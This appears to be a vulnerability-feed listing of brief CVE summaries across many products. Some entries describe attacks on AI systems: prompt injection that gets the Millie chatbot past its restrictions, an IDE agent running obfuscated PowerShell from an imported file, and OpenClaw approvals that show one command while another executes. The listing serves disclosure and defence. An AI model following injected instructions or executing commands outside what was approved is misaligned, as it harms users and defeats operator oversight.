Command substitution in OpenClaw's node-host approval system allows authenticated attackers with low privileges to execute arbitrary local code by deceiving operators through mismatched approval displays. The system shows extracted shell payloads during approval but executes different argv commands, enabling wrapper-binary attacks where approved commands differ from executed commands. Authentication is required (PR:L) with high attack complexity (AC:H) and user interaction (UI:R). No public exploit identified at time of analysis, though the vulnerability class (CWE-451: UI Misrepresentation of Critical Information) indicates the technical mechanism is well-understood.

Information Disclosure
CVE-2026-32920 HIGH CVSS 8.6
Remote code execution in OpenClaw (versions prior to 2026.3.12) enables attackers to execute arbitrary malicious code when users open compromised repositories. The vulnerability stems from automatic plugin loading from .OpenClaw/extensions/ directories without trust verification, allowing attackers to embed malicious workspace plugins in cloned Git repositories. CVSS 9.8 (Critical) reflects network-based exploitation requiring no authentication or user interaction. No public exploit identified at time of analysis, though the attack mechanism is straightforward for social engineering scenarios targeting developers.

RCE
CVE-2026-32734 HIGH CVSS 7.1
DOM-based cross-site scripting in baserCMS tag creation functionality allows remote attackers to execute malicious JavaScript in victim browsers. Affects all baserCMS versions prior to 5.2.3. The vulnerability requires user interaction (CVSS UI:R) but needs no authentication (PR:N), enabling phishing or social engineering attacks. EPSS data not available; no public exploit identified at time of analysis. Vendor-released patch available in version 5.2.3.

XSS
CVE-2026-32727 HIGH CVSS 8.1
Path traversal in SciTokens library (all versions before 1.9.7) allows authenticated attackers to bypass directory access restrictions and access unauthorized files. Attackers can inject dot-dot-slash sequences (..) into JWT scope claims to escape intended authorization boundaries due to improper path normalization during enforcement checks. CVSS 8.1 (High) with network attack vector and low complexity. EPSS data not available; no confirmed active exploitation (CISA KEV) identified at time of analysis, though publicly available exploit code exists via GitHub advisory and commit references.

Path Traversal
CVE-2026-32726 HIGH CVSS 8.1
Authorization bypass in SciTokens C++ library (versions prior to 1.4.1) allows authenticated attackers to access unauthorized filesystem paths via flawed scope validation. The library's path-prefix matching does not enforce path-segment boundaries, enabling a token scoped to '/data/project1' to incorrectly authorize access to '/data/project10' or '/data/project1-backup'. CVSS 8.1 (High) reflects the significant confidentiality and integrity impact, though exploitation requires low-privilege authenticated access (PR:L). No public exploit identified at time of analysis, with EPSS data not available for recent CVE. Vendor-released patch available in version 1.4.1.

Authentication Bypass
CVE-2026-32725 HIGH CVSS 8.3
Authorization bypass in scitokens-cpp library (all versions prior to 1.4.1) allows authenticated attackers to escape path-based scope restrictions via parent-directory traversal in token scope claims. The library incorrectly normalizes '..' components instead of rejecting them, enabling privilege escalation to access resources outside intended directories. EPSS data not provided, but the vulnerability is network-exploitable with low attack complexity (CVSS 8.3). No confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis, though the fix commit is publicly documented.

Path Traversal
CVE-2026-32716 HIGH CVSS 8.1
Authorization bypass in SciTokens library (versions prior to 1.9.6) allows authenticated users with valid tokens scoped to specific paths to access unintended sibling paths through flawed prefix-matching validation logic. An attacker with a token for '/john' can access '/johnathan' or '/johnny' due to incorrect string prefix validation in the Enforcer component, enabling unauthorized data access and modification (CVSS 8.1, High integrity/confidentiality impact). No public exploit identified at time of analysis, though the vulnerability is straightforward to exploit with valid credentials (EPSS data not provided, CVSS complexity rated Low).

Authentication Bypass
CVE-2026-30940 HIGH CVSS 7.2
Authenticated path traversal in baserCMS theme file management API (versions prior to 5.2.3) enables arbitrary file write, allowing administrators to create malicious PHP files outside the theme directory and achieve remote code execution. The vulnerability (CWE-22) requires high privileges (PR:H) but has low attack complexity (AC:L) with network access (AV:N). CVSS score of 7.2 reflects the significant impact when administrator credentials are compromised. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details in the advisory provide sufficient information for weaponization.

RCE Path Traversal PHP
CVE-2026-30309 HIGH CVSS 7.8
InfCode's terminal auto-execution module fails to properly validate PowerShell commands due to an ineffective blacklist and lack of semantic parsing, allowing attackers to bypass command filtering through syntax obfuscation. When a user imports a specially crafted file into the IDE, the Agent executes arbitrary PowerShell commands without user confirmation, leading to remote code execution or sensitive data exfiltration. No public exploit code or active exploitation has been confirmed at time of analysis.

Command Injection Information Disclosure Microsoft
CVE-2026-30290 HIGH CVSS 8.4
Arbitrary file overwrite in InTouch Contacts & Caller ID APP v6.38.1 allows remote attackers to overwrite critical internal files through the file import process, enabling arbitrary code execution or sensitive information exposure. Affected versions are limited to 6.38.1; no CVSS score, EPSS, or active exploitation status (KEV) is available at this time, though the vulnerability chain to RCE presents material risk.

Path Traversal RCE Information Disclosure
CVE-2026-30284 HIGH CVSS 8.6
Arbitrary file overwrite in UXGROUP LLC Voice Recorder v10.0 allows remote attackers to overwrite critical internal files through the file import mechanism, enabling arbitrary code execution or sensitive information exposure. No CVSS score, EPSS data, or KEV status was available at analysis time; exploitation likelihood cannot be quantified from standard metrics, but the presence of publicly documented vulnerability research suggests active security scrutiny.

RCE Information Disclosure
CVE-2026-30279 HIGH CVSS 8.4
Arbitrary file overwrite in My Location Travel Timeline v11.80 by Squareapps LLC permits attackers to overwrite critical internal files through the file import process, resulting in arbitrary code execution or information disclosure. Attack vector and complexity details are not confirmed from available CVSS data, and active exploitation status is unconfirmed.

Path Traversal RCE Information Disclosure
CVE-2026-30277 HIGH CVSS 8.4
Arbitrary file overwrite in PDF Reader App TA/UTAX Mobile Print v3.7.2.251001 allows remote attackers to overwrite critical internal files during the file import process, potentially leading to remote code execution or unauthorized information exposure. The vulnerability affects a mobile print utility with demonstrated proof-of-concept documentation available on GitHub, though CVSS scoring and formal vendor patch status remain unavailable at time of analysis.

Path Traversal RCE Information Disclosure
CVE-2026-29870 HIGH CVSS 7.6
Directory traversal in agentic-context-engine up to version 0.7.1 enables arbitrary file writes through the checkpoint_dir parameter in OfflineACE.run, exploiting inadequate path normalization in the save_to_file method. Unauthenticated attackers can overwrite arbitrary files within the application process's permissions scope, potentially achieving code execution, privilege escalation, or application compromise depending on deployment context and file system layout.

Path Traversal Privilege Escalation RCE
CVE-2026-27489 HIGH CVSS 8.7
Symlink-based path traversal in ONNX Python library allows local attackers to read arbitrary files on the host system when loading maliciously crafted ONNX models with external data. Affected users who load untrusted ONNX models from compressed archives or external sources may inadvertently expose sensitive files (/etc/passwd, environment variables via /proc/1/environ, etc.). Publicly available exploit code exists with a detailed proof-of-concept demonstrating the vulnerability. No EPSS score or CISA KEV listing available at time of analysis, suggesting exploitation is not yet widespread.

Path Traversal Python Redhat Suse
CVE-2026-27124 HIGH CVSS 8.2
FastMCP OAuthProxy allows authentication bypass through a Confused Deputy attack, enabling attackers to hijack victim OAuth sessions and gain unauthorized access to MCP servers. When victims who previously authorized a legitimate MCP client are tricked into opening a malicious authorization URL, the OAuthProxy fails to validate browser-bound consent, redirecting valid authorization codes to attacker-controlled clients. This affects the GitHubProvider integration and potentially all OAuth providers that skip consent prompts for previously authorized applications. No public exploit identified at time of analysis, though detailed reproduction steps are publicly documented in the GitHub security advisory.

Authentication Bypass Microsoft Redhat
CVE-2026-25726 HIGH CVSS 8.1
Weak pseudo-random number generation in Cloudreve enables JWT forgery and complete account takeover on instances initialized before v4.10.0. Attackers can brute-force the PRNG seed (achievable in under 3 hours on consumer hardware) by obtaining administrator creation timestamps via public APIs and validating against known hashids, then forge valid JWTs for any user including administrators. No public exploit confirmed at time of analysis, though detailed attack methodology is disclosed. CVSS 8.1 (High) reflects network-accessible privilege escalation despite high attack complexity requiring cryptographic brute-forcing.

Privilege Escalation OpenSSL
CVE-2026-24165 HIGH CVSS 7.8
Deserialization of untrusted data in NVIDIA BioNeMo Framework enables local attackers to execute arbitrary code, cause denial of service, disclose sensitive information, or tamper with data when users open malicious files. CVSS 7.8 (High) reflects local attack vector requiring user interaction. EPSS data not available; no public exploit identified at time of analysis. Affects NVIDIA BioNeMo Framework, a platform for AI-driven drug discovery and biomolecular research.

Deserialization RCE Denial Of Service Information Disclosure Nvidia
CVE-2026-24164 HIGH CVSS 8.8
Insecure deserialization in NVIDIA BioNeMo Framework enables remote code execution when attackers can induce users to process malicious serialized data. This vulnerability (CWE-502) affects the BioNeMo Framework with network-reachable attack surface (AV:N) and low complexity (AC:L), requiring only user interaction (UI:R) but no authentication (PR:N). The CVSS 8.8 rating reflects critical impacts across confidentiality, integrity, and availability. No public exploit identified at time of analysis, though the deserialization vulnerability class is well-understood and commonly exploited. EPSS data not available for this CVE.

Deserialization RCE Denial Of Service Information Disclosure Nvidia
CVE-2026-24154 HIGH CVSS 7.6
Command injection in NVIDIA Jetson Linux initrd allows physical attackers to execute arbitrary code with elevated privileges across Jetson Xavier, Orin, and Thor series devices. An attacker with physical access can inject malicious command-line arguments during boot without authentication (CVSS:3.1/AV:P/AC:L/PR:N), leading to complete system compromise including root-level code execution, denial of service, and data exfiltration. EPSS data not available; no public exploit identified at time of analysis, though the low attack complexity (AC:L) and physical-only requirement (AV:P) suggest exploitation is straightforward for adversaries with device access.

Command Injection RCE Denial Of Service Information Disclosure Nvidia
CVE-2026-24148 HIGH CVSS 8.3
NVIDIA Jetson system initialization flaw allows authenticated remote attackers to exploit insecure default machine IDs, enabling cross-device information disclosure of encrypted data and tampering. Affects JetPack on Xavier and Orin series devices. CVSS 8.3 (High) with network attack vector and low complexity. EPSS data not available; no confirmed active exploitation (CISA KEV status not present). The vulnerability enables attackers with low-level privileges to compromise multiple devices sharing identical default machine identifiers, undermining cryptographic protections and system integrity across the device fleet.

Information Disclosure Denial Of Service Nvidia
CVE-2026-20915 HIGH CVSS 8.5
Stored cross-site scripting (XSS) in Checkmk 2.5.0 beta allows authenticated users with pending change permissions to inject malicious JavaScript into the Pending Changes sidebar, executing in the browsers of other users who view that sidebar. This vulnerability affects the beta release 2.5.0 before version 2.5.0b2 and requires existing user authentication with specific permissions to exploit.

XSS
CVE-2026-5214 HIGH CVSS 7.4
Stack-based buffer overflow in D-Link NAS device management interfaces allows authenticated remote attackers to execute arbitrary code with high impact across 21 product models. The vulnerability resides in the cgi_addgroup_get_group_quota_minsize function within /cgi-bin/account_mgr.cgi, exploitable via malicious Name parameter input. Public exploit code exists on GitHub, significantly lowering the technical barrier for attacks. Authentication is required (PR:L), but once authenticated, attackers achieve full confidentiality, integrity, and availability compromise. EPSS and KEV status not provided, but the combination of public POC, network accessibility (AV:N), low complexity (AC:L), and widespread device deployment represents material risk to organizations using affected D-Link NAS products.

D-Link Buffer Overflow Stack Overflow
CVE-2026-5213 HIGH CVSS 7.4
Stack-based buffer overflow in D-Link NAS devices allows authenticated remote attackers to achieve complete system compromise with high-confidence exploitation. Affects 20+ D-Link DNS and DNR series network storage products through firmware versions released until February 5, 2026. Publicly available exploit code exists targeting the account_mgr.cgi component, enabling remote code execution with low attack complexity once authenticated. CVSS 8.8 (High) with confirmed proof-of-concept demonstrates practical exploitability despite requiring low-privilege authentication.

D-Link Stack Overflow Buffer Overflow
CVE-2026-5212 HIGH CVSS 7.4
Stack-based buffer overflow in D-Link NAS devices enables authenticated remote attackers to execute arbitrary code with full system privileges. Affecting 20+ end-of-life D-Link DNS and DNR network storage models through firmware version 20260205, the flaw resides in the Webdav_Upload_File function within /cgi-bin/webdav_mgr.cgi. Publicly available exploit code exists, significantly lowering the barrier to exploitation. CVSS 8.8 (High) reflects network-accessible attack requiring only low-privilege authentication with no user interaction. Organizations using these legacy devices face immediate risk of complete confidentiality, integrity, and availability compromise.

D-Link Stack Overflow Buffer Overflow
CVE-2026-5211 HIGH CVSS 7.4
Stack-based buffer overflow in D-Link NAS devices enables remote code execution with high integrity impact for authenticated users. The vulnerability resides in the UPnP_AV_Server_Path_Del function within /cgi-bin/app_mgr.cgi, exploitable via manipulation of the f_dir parameter. With CVSS 8.8 (High), low attack complexity (AC:L), network accessibility (AV:N), and publicly available exploit code, this represents an elevated threat to approximately 20 legacy D-Link NAS models through firmware versions up to 20260205. No vendor-released patch identified at time of analysis, and many affected models appear to be end-of-life products.

D-Link Buffer Overflow Stack Overflow
CVE-2026-5204 HIGH CVSS 7.4
Stack-based buffer overflow in Tenda CH22 router version 1.0.0.1 allows authenticated remote attackers to achieve arbitrary code execution via the webSiteId parameter in the formWebTypeLibrary function. Public exploit code exists on GitHub, significantly lowering the barrier to exploitation. While requiring low-privilege authentication (PR:L), the vulnerability enables complete compromise of router confidentiality, integrity, and availability with low attack complexity.

Tenda Buffer Overflow Stack Overflow
CVE-2026-5201 HIGH CVSS 7.5
Heap-based buffer overflow in gdk-pixbuf JPEG loader allows unauthenticated remote attackers to trigger denial of service through specially crafted JPEG images without user interaction. The vulnerability affects Red Hat Enterprise Linux versions 6 through 10 and can be triggered automatically during thumbnail generation operations. With CVSS 7.5 (High) and network-accessible attack vector, this poses significant availability risk. No public exploit identified at time of analysis, though EPSS data not available for final risk quantification.

Heap Overflow Denial Of Service Buffer Overflow
CVE-2026-5190 HIGH CVSS 7.7
Memory corruption leading to arbitrary code execution affects AWS C Event Stream library versions before 0.6.0 when clients process malicious event-stream messages from attacker-controlled servers. The out-of-bounds write vulnerability in the streaming decoder requires high attack complexity and user interaction (CVSS:3.1/AV:N/AC:H/PR:N/UI:R), but grants complete control over confidentiality, integrity, and availability if successfully exploited. No public exploit identified at time of analysis, with EPSS data unavailable for this 2026-dated CVE. Vendor-released patch version 0.6.0 addresses the issue.

Buffer Overflow RCE Memory Corruption
CVE-2026-5087 HIGH CVSS 7.5
PAGI::Middleware::Session::Store::Cookie through version 0.001003 generates cryptographically weak initialization vectors (IVs) for session cookie encryption by falling back to Perl's built-in rand() function when /dev/urandom is unavailable, particularly affecting Windows systems. This predictable IV generation enables attackers to decrypt and tamper with session data stored in cookies, compromising session confidentiality and integrity. No active exploitation has been confirmed, but the vulnerability affects all deployments on systems lacking /dev/urandom access.

Information Disclosure Microsoft
CVE-2026-4800 HIGH CVSS 8.1
Remote code execution in Lodash <4.18.0 allows unauthenticated attackers to execute arbitrary JavaScript code during template compilation by injecting malicious key names into options.imports parameter. The vulnerability bypasses the CVE-2021-23337 fix by exploiting an unvalidated code path that flows into the same Function() constructor sink. With CVSS 8.1 (High) and EPSS data not provided, this represents a significant supply chain risk for applications using Lodash's template functionality with untrusted input. No public exploit confirmed at time of analysis, though the technical details in the advisory provide a clear exploitation roadmap.

Code Injection RCE
CVE-2026-4400 HIGH CVSS 7.0
Insecure Direct Object Reference (IDOR) in 1millionbot Millie chat allows unauthenticated remote attackers to access other users' private chatbot conversations by manipulating conversation IDs in API requests to 'api.1millionbot.com/api/public/conversations/'. An attacker with knowledge of a target conversation ID can retrieve sensitive or confidential data without authentication. No public exploit code or active exploitation has been independently confirmed at the time of analysis.

Authentication Bypass
CVE-2026-4399 HIGH CVSS 8.7
Prompt injection in 1millionbot Millie chatbot allows remote attackers to bypass chat restrictions using Boolean logic techniques, enabling retrieval of prohibited information and execution of unintended tasks including potential abuse of OpenAI API keys. The vulnerability exploits insufficient input validation in the LLM's containment mechanisms, permitting attackers to reformulate queries in ways that trigger affirmative responses ('true') that then execute injected instructions outside the chatbot's intended scope.

Code Injection
CVE-2026-4020 HIGH CVSS 7.5
Sensitive system configuration data exposure in Gravity SMTP for WordPress (all versions ≤2.1.4) allows unauthenticated remote attackers to retrieve comprehensive server information via an unsecured REST API endpoint. The /wp-json/gravitysmtp/v1/tests/mock-data endpoint lacks authentication controls, exposing ~365 KB of JSON containing PHP version, database credentials structure, WordPress configuration, plugin/theme inventories, and configured API keys/tokens. EPSS data not provided; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis, though the attack vector is trivial (CVSS AV:N/AC:L/PR:N).

WordPress PHP Information Disclosure
CVE-2026-3308 HIGH CVSS 7.8
Arbitrary code execution in Artifex MuPDF 1.27.0 via integer overflow in PDF image processing. A maliciously crafted PDF triggers an integer overflow in the pdf_load_image_imp function within pdf-image.c, resulting in a heap out-of-bounds write that enables remote code execution without authentication. No public exploit code or active exploitation has been confirmed at time of analysis.

Integer Overflow RCE Buffer Overflow
CVE-2026-2123 HIGH CVSS 8.6
Privilege escalation in OpenText Operations Agent versions 12.29 and earlier on Windows allows local attackers to execute arbitrary code by placing malicious executables in specific writeable directories, which the agent subsequently executes with elevated privileges. The vulnerability requires local access and specific conditions to be present but does not require prior authentication to the agent itself. No public exploit code has been identified, and there is no confirmation of active exploitation at time of analysis.

Microsoft Privilege Escalation
CVE-2025-32957 HIGH CVSS 8.7
Arbitrary code execution in baserCMS versions before 5.2.3 allows authenticated administrators to achieve remote code execution via malicious PHP files embedded in backup restore archives. The vulnerability exploits unsafe file inclusion during ZIP extraction in the restore function, where uploaded PHP files are executed via require_once without filename validation. No public exploit identified at time of analysis, though EPSS score of 0.00043 (0.043%) and CVSS 8.7 indicate moderate theoretical risk mitigated by high privilege requirements (PR:H).

PHP RCE File Upload
CVE-2025-14213 HIGH CVSS 8.3
Command injection in Cato Networks Socket (versions prior to 25) enables authenticated administrators with web interface access to execute arbitrary commands as root on the underlying system. The vulnerability requires high-level privileges (CVSS PR:H) but offers complete system compromise once accessed, with network-based attack vector and low complexity. No public exploit identified at time of analysis, though the command injection class (CWE-78) is well-understood and straightforward to weaponize once administrative credentials are obtained.

Command Injection
CVE-2025-10559 HIGH CVSS 7.1
Path traversal in DELMIA Factory Resource Manager (3DEXPERIENCE R2023x through R2025x) allows authenticated remote attackers to read sensitive files and write files to specific server directories. The vulnerability affects the Factory Resource Management component and requires low-privilege authentication (CVSS PR:L) with low attack complexity. EPSS data not available; no public exploit identified at time of analysis. This represents a significant data exposure risk in industrial manufacturing environments using Dassault Systèmes' 3DEXPERIENCE platform.

Path Traversal
CVE-2025-10553 HIGH CVSS 8.7
Stored cross-site scripting in Dassault Systèmes DELMIA Factory Resource Manager (R2023x through R2025x) allows authenticated attackers to inject malicious scripts that execute in victims' browser sessions with changed scope impact. CVSS 8.7 severity reflects the scope change (S:C) enabling attacks beyond the vulnerable component's privileges. No public exploit code identified and not listed in CISA KEV at time of analysis, though the low attack complexity (AC:L) indicates straightforward exploitation once authenticated access is obtained.

XSS
CVE-2025-10551 HIGH CVSS 8.7
Stored Cross-Site Scripting (XSS) in Dassault Systèmes ENOVIA Collaborative Industry Innovator's Document Management module enables authenticated attackers to inject malicious scripts that execute in other users' browser sessions across 3DEXPERIENCE releases R2023x through R2025x. With CVSS 8.7 (High severity) and scope change (S:C), successful exploitation allows session hijacking, credential theft, and persistent compromise of users accessing manipulated documents. EPSS data not available; no public exploit identified at time of analysis, though the low attack complexity (AC:L) makes exploitation straightforward once an attacker gains low-privilege access (PR:L).

XSS
CVE-2026-34887 MEDIUM CVSS 6.5
Stored cross-site scripting (XSS) in Extend Themes Kubio AI Page Builder through version 2.7.0 allows authenticated users to inject malicious scripts that execute in the browsers of other users viewing affected pages. An attacker with user account access can inject unescaped input during page generation, leading to session hijacking, credential theft, or malware distribution. No public exploit code has been identified at the time of analysis.

XSS
CVE-2026-34881 MEDIUM CVSS 5.0
Server-Side Request Forgery in OpenStack Glance image import allows authenticated users to bypass URL validation via HTTP redirects and reach internal services. Affected versions include Glance prior to 29.1.1, 30.0.0 through 30.1.0, and 31.0.0. The vulnerability impacts web-download and glance-download import methods, plus the optional ovf_process plugin. An authenticated attacker can craft a redirect chain to access restricted internal endpoints, though the CVSS vector indicates no confidentiality impact and limited integrity risk (CVSS 5.0). No public exploit code or active exploitation has been confirmed at time of analysis.

SSRF
CVE-2026-34740 MEDIUM CVSS 6.5
Stored server-side request forgery (SSRF) in WWBN AVideo 26.0 and prior allows authenticated users with upload permissions to inject arbitrary URLs into the EPG (Electronic Program Guide) link feature, which the server automatically fetches on each EPG page visit. This enables attackers to scan internal networks, access cloud metadata services, and interact with internal services without the authentication or complexity barriers normally present in network-based attacks. No public exploit code identified at time of analysis.

SSRF
CVE-2026-34739 MEDIUM CVSS 6.1
Stored cross-site scripting (XSS) via unencoded HTML reflection in WWBN AVideo's User_Location plugin testIP.php endpoint allows authenticated attackers to execute arbitrary JavaScript in admin sessions. Affecting AVideo 26.0 and earlier, the vulnerability exploits SameSite=None cookie configuration to enable cross-origin exploitation, permitting unauthenticated attackers to lure admins to malicious links that hijack their authenticated context. No public exploit code or vendor patch has been released at time of analysis.

PHP XSS
CVE-2026-34738 MEDIUM CVSS 4.3
WWBN AVideo versions 26.0 and prior allow authenticated uploaders to bypass content moderation by directly setting video status to active via an unvalidated overrideStatus parameter, circumventing admin-controlled review workflows. The vulnerability affects any user with upload permissions and has a CVSS score of 4.3 (low-to-moderate severity) with no public exploit code identified at time of analysis.

Authentication Bypass
CVE-2026-34737 MEDIUM CVSS 6.5
Authenticated users in WWBN AVideo 26.0 and prior can cancel arbitrary Stripe subscriptions through an exposed test.php debug endpoint in the StripeYPT plugin, exploiting a logic error in the retrieveSubscriptions() method that performs cancellation instead of retrieval. The vulnerability requires valid login credentials but allows any authenticated user-not just administrators-to trigger subscription cancellations, causing integrity violations to payment operations. No public exploit code or active exploitation has been reported at time of analysis, and vendor patches are not yet available.

PHP Authentication Bypass
CVE-2026-34733 MEDIUM CVSS 6.5
Unauthenticated remote attackers can bypass CLI-only access controls in WWBN AVideo versions 26.0 and prior via a PHP operator precedence bug in install/deleteSystemdPrivate.php, allowing HTTP access to delete server temp directory files and disclose their contents without authentication. The vulnerability stems from a logic error where !php_sapi_name() === 'cli' evaluates incorrectly due to operator binding precedence, causing the access guard to fail entirely. No public exploit code or active exploitation has been reported at the time of this analysis.

PHP Authentication Bypass
CVE-2026-34732 MEDIUM CVSS 5.3
WWBN AVideo 26.0 and prior exposes sensitive user data through 21 unauthenticated API endpoints via the CreatePlugin template generator. The list.json.php template lacks authentication checks present in its companion add.json.php and delete.json.php templates, allowing remote attackers to enumerate and retrieve user PII, payment logs, IP addresses, user agents, and internal system records without authentication. No vendor patch exists at time of analysis.

Authentication Bypass Information Disclosure PHP
CVE-2026-34716 MEDIUM CVSS 6.4
Stored cross-site scripting (XSS) in WWBN AVideo versions 26.0 and prior allows authenticated attackers to execute arbitrary JavaScript in the browsers of online users without any victim interaction. An attacker with a user account can set their display name to an XSS payload; when they initiate a call via the YPTSocket plugin, the caller notification rendered by the jQuery Toast Plugin executes the malicious script in every connected user's browser, enabling session hijacking, credential theft, or further compromise. CVSS 6.4 reflects moderate complexity due to authentication requirement and limited direct impact scope.

XSS RCE
CVE-2026-34613 MEDIUM CVSS 6.5
CSRF vulnerability in WWBN AVideo 26.0 and prior allows unauthenticated attackers to disable critical security plugins on admin accounts via malicious web pages, exploiting missing CSRF token validation combined with SameSite=None session cookies and ORM-level security bypass. An attacker can trick an authenticated administrator into visiting a crafted webpage that silently disables plugins such as LoginControl (2FA), subscription enforcement, or access control mechanisms, compromising the platform's security posture without the admin's knowledge or consent.

CSRF PHP
CVE-2026-34611 MEDIUM CVSS 6.5
CSRF vulnerability in WWBN AVideo 26.0 and prior allows unauthenticated attackers to send arbitrary HTML emails to all platform users by luring administrators to a malicious webpage. The vulnerability exploits absent CSRF token validation on the emailAllUsers.json.php endpoint combined with SameSite=None session cookie configuration, enabling cross-origin POST requests to execute with the admin's session credentials. An attacker can impersonate the platform's legitimate SMTP sender to distribute phishing emails, spam, or malware links to the entire user base without any authentication requirement beyond initial admin compromise via social engineering.

PHP CSRF
CVE-2026-34595 MEDIUM CVSS 5.3
Parse Server versions prior to 8.6.70 and 9.7.0-alpha.18 allow authenticated users with find class-level permissions to bypass protectedFields restrictions on LiveQuery subscriptions by submitting array-like objects with numeric keys instead of proper arrays in $or, $and, or $nor operators. This enables information disclosure through a binary oracle attack that reveals whether protected fields match attacker-supplied values. The vulnerability requires prior authentication and find-level access but no user interaction, affecting all deployments of vulnerable Parse Server versions.

Node.js Authentication Bypass Memory Corruption Oracle
CVE-2026-34586 MEDIUM CVSS 6.5
PdfDing prior to version 1.7.1 permits authenticated users to bypass access controls on shared PDF documents by accessing content after expiration, view limits, or soft-deletion due to incomplete validation in the check_shared_access_allowed() function. The Serve and Download endpoints rely solely on session existence checks without verifying SharedPdf.inactive or SharedPdf.deleted flags, allowing previously-authorized users to retrieve sensitive content that should no longer be accessible. This authentication bypass affects all versions before 1.7.1 and requires valid authentication credentials to exploit.

Authentication Bypass
CVE-2026-34574 MEDIUM CVSS 5.3
Authenticated users in Parse Server prior to versions 8.6.69 and 9.7.0-alpha.14 can bypass immutability protections on session fields by submitting null values in PUT requests to the session update endpoint, allowing indefinite session validity and circumventing configured session expiration policies. The vulnerability requires valid authentication credentials to exploit and has been patched in the specified versions.

Node.js Authentication Bypass
CVE-2026-34556 MEDIUM CVSS 6.2
Heap buffer overflow in iccDEV's icAnsiToUtf8() function allows local attackers to cause denial of service via a crafted ICC color profile processed by the iccToXml tool. The vulnerability exists in versions prior to 2.3.1.6 and stems from unsafe string handling that treats non-null-terminated buffers as C-strings, triggering out-of-bounds memory reads. CVSS 6.2 with local attack vector and no authentication required; vendor-released patch available in version 2.3.1.6.

Buffer Overflow Information Disclosure
CVE-2026-34555 MEDIUM CVSS 6.2
Stack buffer overflow in iccDEV library versions prior to 2.3.1.6 allows local attackers to cause denial of service by crafting malicious ICC color management profile files that trigger a 4-byte write overflow in CIccTagFixedNum<>::GetValues(). The vulnerability requires local access and no user interaction, with CVSS 6.2 reflecting the high availability impact. No public exploit code or active exploitation has been identified; vendor-released patch version 2.3.1.6 is available.

Buffer Overflow Stack Overflow
CVE-2026-34554 MEDIUM CVSS 6.2
Heap buffer overflow in iccDEV's CIccApplyCmmSearch::costFunc() function allows local attackers to trigger an out-of-bounds memory read via malformed JSON configuration input to the iccApplySearch tool, resulting in denial of service. The vulnerability affects iccDEV versions prior to 2.3.1.6 and has been patched; no public exploit identified at time of analysis, though the issue is straightforward to trigger with crafted input.

Buffer Overflow Information Disclosure
CVE-2026-34553 MEDIUM CVSS 4.0
Local integrity modification in iccDEV prior to version 2.3.1.6 affects the CIccCLUT::Iterate() function and CLUT dumping output in CIccMBB::Describe(), allowing local attackers without privileges to alter ICC color profile data integrity. The vulnerability requires local access and produces incorrect LUT (Look-Up Table) dump output that could compromise color management workflows relying on accurate profile representation.

Information Disclosure
CVE-2026-34552 MEDIUM CVSS 6.2
Null pointer dereference in iccDEV versions prior to 2.3.1.6 causes denial of service when processing ICC color management profiles with malformed lookup table (LUT) structures. The vulnerability exists in IccTagLut.cpp where CIccApplyCLUT member access occurs without null validation, allowing local attackers to crash applications that parse untrusted color profiles. No public exploit code or active exploitation has been confirmed at time of analysis.

Null Pointer Dereference Denial Of Service
CVE-2026-34551 MEDIUM CVSS 6.2
Denial of service via null-pointer dereference in iccDEV prior to version 2.3.1.6 allows local attackers to crash the application by processing a crafted ICC color profile embedded in a TIFF file. The vulnerability exists in the CIccTagLut16::Write() function and requires local file system access but no authentication or user interaction. No public exploit code or active exploitation has been confirmed; the issue is considered moderate severity due to denial-of-service impact only (no code execution or data compromise).

Null Pointer Dereference Denial Of Service
CVE-2026-34550 MEDIUM CVSS 6.2
Denial of service in iccDEV prior to version 2.3.1.6 caused by undefined behavior from unsafe implicit conversion of negative signed integers to unsigned size_t in IccProfLib/IccIO.cpp. Local attackers can exploit this condition to crash applications using vulnerable iccDEV libraries by providing specially crafted ICC color profile files, resulting in high availability impact with no authentication required.

Information Disclosure
CVE-2026-34549 MEDIUM CVSS 6.2
Denial of service via crafted ICC color profile in iccDEV library prior to version 2.3.1.6 triggers undefined behavior through invalid left shift operations on 32-bit unsigned integers, causing application crashes. The vulnerability affects all iccDEV versions before 2.3.1.6 and requires only local file access to exploit (no authentication or user interaction required beyond opening a malicious profile). No public exploit code or active exploitation has been identified at time of analysis.

Information Disclosure
CVE-2026-34548 MEDIUM CVSS 6.2
Denial of service in iccDEV prior to version 2.3.1.6 allows local attackers to crash the iccToXml XML conversion tool via undefined behavior caused by implicit conversion of negative signed integers to unsigned 32-bit values. The vulnerability has CVSS 6.2 (medium severity) and affects all versions before the patched release; no public exploit code has been identified, but the issue is straightforward to trigger with malformed ICC color profiles containing negative integer values.

Information Disclosure
CVE-2026-34547 MEDIUM CVSS 6.2
Denial of service via undefined behavior in iccDEV versions prior to 2.3.1.6 allows local attackers to crash the iccDumpProfile tool by supplying a crafted ICC color profile. The vulnerability exploits an unsafe memory operation in IccUtil.cpp triggered during profile parsing, resulting in application termination with no authentication required. No public exploit code or active exploitation has been reported at time of analysis.

Information Disclosure
CVE-2026-34546 MEDIUM CVSS 6.2
Denial of service via division by zero in iccDEV prior to version 2.3.1.6 allows local attackers to crash the iccTiffDump utility by supplying a crafted TIFF file, resulting in undefined behavior and availability impact. The vulnerability requires local file access and no authentication, but exploitation is limited to denial of service rather than code execution or information disclosure. CVSS 6.2 reflects medium severity with high availability impact; no public exploitation or CISA KEV status reported.

Information Disclosure
CVE-2026-34542 MEDIUM CVSS 6.2
Stack buffer overflow in iccDEV library versions prior to 2.3.1.6 allows local attackers to trigger a denial of service by crafting a malicious ICC color profile that overflows a 4-byte stack buffer in the CIccCalculatorFunc::Apply() function during profile processing. The vulnerability requires local access and no user interaction, with CVSS 6.2 reflecting high availability impact but no direct code execution path; vendor-released patch is available in version 2.3.1.6.

Stack Overflow Buffer Overflow
CVE-2026-34541 MEDIUM CVSS 6.2
Denial of service in iccDEV prior to version 2.3.1.6 allows local attackers to crash the iccApplyNamedCmm tool by supplying a malformed ICC color profile that triggers a null-pointer dereference in the CIccCombinedConnectionConditions constructor. The vulnerability requires local file system access to provide the crafted profile and causes application termination with no code execution or data corruption, affecting users processing untrusted ICC profiles through the -PCC flag.

Null Pointer Dereference Denial Of Service
CVE-2026-34540 MEDIUM CVSS 6.2
Heap buffer overflow in iccDEV prior to version 2.3.1.6 allows denial of service via a crafted ICC color profile that triggers out-of-bounds heap read in icMemDump() when iccDumpProfile processes malformed tag contents. The vulnerability affects local attackers without authentication or user interaction, though the practical attack surface depends on how iccDumpProfile is invoked in consuming applications. No public exploit code or active exploitation has been identified; the issue was discovered through code analysis and AddressSanitizer instrumentation.

